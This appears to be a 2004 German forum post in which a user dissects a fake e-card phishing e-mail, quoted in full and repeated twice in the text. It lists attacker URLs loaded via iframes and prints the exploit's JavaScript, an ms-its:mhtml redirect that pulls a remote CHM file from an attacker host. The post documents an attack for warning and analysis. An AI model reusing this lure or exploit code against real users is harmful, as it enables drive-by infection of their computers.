Gool
29.12.2004, 00:33
Received: from [144.133.235.182] (helo=compuserve.com)
by mx28.web.de with smtp (WEB.DE 4.103 #184)
ID: [ID filtered]
for xxx; Tue, 28 Dec 2004 xx:xx:xx +0100
Date: Tue, 28 Dec 2004 xx:xx:xx +0000
From: parkerm [at] coneharvesters.com
Subject: Blueslayah, You`ve received a postcard!
To: Blueslayah <xxx>
References: <2IB9I09J6F8JG421 [at] web.de>
In-Reply-To: <2IB9I09J6F8JG421 [at] web.de>
Message-ID: [ID filtered]
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: parkerm [at] coneharvesters.com
You have just received a virtual postcard from Aunt Edna!
You can pick up your postcard at the following web address:
h11p://www.postcards.org/?91-dodge-treads-aunt
If you can`t click on the web address above, you can also
visit 1001 Postcards at h11p://www.postcards.org/postcards/
and enter your pickup code, which is: 91-dodge-treads-aunt
(Your postcard will be available for 60 days.)
We hope you enjoy your postcard, and if you do,
please take a moment to send a few yourself!
Regards,
1001 Postcards
h11p://www.postcards.org/postcards/
P.S. If you`re happy with our service, let us know by
making a donation to help us pay our server hosting costs!
Please visit our donation page at Amazon.com!
h11p://www.amazon.com/paypage/PHVNBUIYDIUYD98QH
------------------------------------------------
Introducing the 1001 Postcards weekly newsletter!
Click here to subscribe for free to `Greetings from Marty & Alice`:
h11p://browse.postcards.org/go/postcards...cribe&email=xxx (h11p://browse.postcards.org/go/postcards/newsletter?action=subscribe&email=xxx)
------------------------------------------------
sender-ip: 55.97.53.71
Die Links in der E-Mail führen tatsächlich alle zu h11p://4.40.128.96:8180/008/ - mal wieder geschickt per HTML-Mail hinter harmlosen Links verborgen.
Der Exploit: Norton meldet mir "MHTMLRedir.Exploit"
Beim Aufruf der Seite wird folgendes in iframes geladen:
h11p://4.40.128.96:8180/007/index1.html
h11p://213.159.117.133/dl/adv50.php
h11p://213.159.117.133/dl/adv152.php
h11p://209.8.20.130/dl/adv230.php
h11p://206.161.125.149/in.php?wm=1268
Was genau dann passiert, weiß ich nicht. wird aber vermutlich dasselbe wie hier (http://www.heise.de/security/artikel/49687) beschrieben sein.
Der erste Link führt folgenden Befehl aus:
<textarea id="cxw" style="display:none;"><object data="${PR}" type="text/x-scriptlet" style="display:none;"></object></textarea>
<script language="javascript">
document.write(cxw.value.replace(/${PR}/g,`ms-its:mhtml:file://c:\nosuch.mht!http://4.40.128.96:8180/007/start.chm::/start.html`));
</script>
Die beiden folgenden Links nutzen den Exploit aus - da mein Virenscanner glücklicherweise dazwischenschreitet, weiß ich nicht, was da passiert - hat jemand ein ungesichertes Windows als vmware, um das mal zu testen?
Bei den letzten beiden Seiten wird mir nur ein 404-Fehler angezeigt.
Nachtrag: gibt es eine kostenlose vmware für Windows? Ansonsten müsste ich sparen, mir ne neue HD zulegen und mir Linux drauf packen - da ist doch eine vmware dabei, um Windows unter Linux laufen zu lassen, oder?
--
Fuck the Spammer: http://spam.blueslayah.de
by mx28.web.de with smtp (WEB.DE 4.103 #184)
ID: [ID filtered]
for xxx; Tue, 28 Dec 2004 xx:xx:xx +0100
Date: Tue, 28 Dec 2004 xx:xx:xx +0000
From: parkerm [at] coneharvesters.com
Subject: Blueslayah, You`ve received a postcard!
To: Blueslayah <xxx>
References: <2IB9I09J6F8JG421 [at] web.de>
In-Reply-To: <2IB9I09J6F8JG421 [at] web.de>
Message-ID: [ID filtered]
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: parkerm [at] coneharvesters.com
You have just received a virtual postcard from Aunt Edna!
You can pick up your postcard at the following web address:
h11p://www.postcards.org/?91-dodge-treads-aunt
If you can`t click on the web address above, you can also
visit 1001 Postcards at h11p://www.postcards.org/postcards/
and enter your pickup code, which is: 91-dodge-treads-aunt
(Your postcard will be available for 60 days.)
We hope you enjoy your postcard, and if you do,
please take a moment to send a few yourself!
Regards,
1001 Postcards
h11p://www.postcards.org/postcards/
P.S. If you`re happy with our service, let us know by
making a donation to help us pay our server hosting costs!
Please visit our donation page at Amazon.com!
h11p://www.amazon.com/paypage/PHVNBUIYDIUYD98QH
------------------------------------------------
Introducing the 1001 Postcards weekly newsletter!
Click here to subscribe for free to `Greetings from Marty & Alice`:
h11p://browse.postcards.org/go/postcards...cribe&email=xxx (h11p://browse.postcards.org/go/postcards/newsletter?action=subscribe&email=xxx)
------------------------------------------------
sender-ip: 55.97.53.71
Die Links in der E-Mail führen tatsächlich alle zu h11p://4.40.128.96:8180/008/ - mal wieder geschickt per HTML-Mail hinter harmlosen Links verborgen.
Der Exploit: Norton meldet mir "MHTMLRedir.Exploit"
Beim Aufruf der Seite wird folgendes in iframes geladen:
h11p://4.40.128.96:8180/007/index1.html
h11p://213.159.117.133/dl/adv50.php
h11p://213.159.117.133/dl/adv152.php
h11p://209.8.20.130/dl/adv230.php
h11p://206.161.125.149/in.php?wm=1268
Was genau dann passiert, weiß ich nicht. wird aber vermutlich dasselbe wie hier (http://www.heise.de/security/artikel/49687) beschrieben sein.
Der erste Link führt folgenden Befehl aus:
<textarea id="cxw" style="display:none;"><object data="${PR}" type="text/x-scriptlet" style="display:none;"></object></textarea>
<script language="javascript">
document.write(cxw.value.replace(/${PR}/g,`ms-its:mhtml:file://c:\nosuch.mht!http://4.40.128.96:8180/007/start.chm::/start.html`));
</script>
Die beiden folgenden Links nutzen den Exploit aus - da mein Virenscanner glücklicherweise dazwischenschreitet, weiß ich nicht, was da passiert - hat jemand ein ungesichertes Windows als vmware, um das mal zu testen?
Bei den letzten beiden Seiten wird mir nur ein 404-Fehler angezeigt.
Nachtrag: gibt es eine kostenlose vmware für Windows? Ansonsten müsste ich sparen, mir ne neue HD zulegen und mir Linux drauf packen - da ist doch eine vmware dabei, um Windows unter Linux laufen zu lassen, oder?
--
Fuck the Spammer: http://spam.blueslayah.de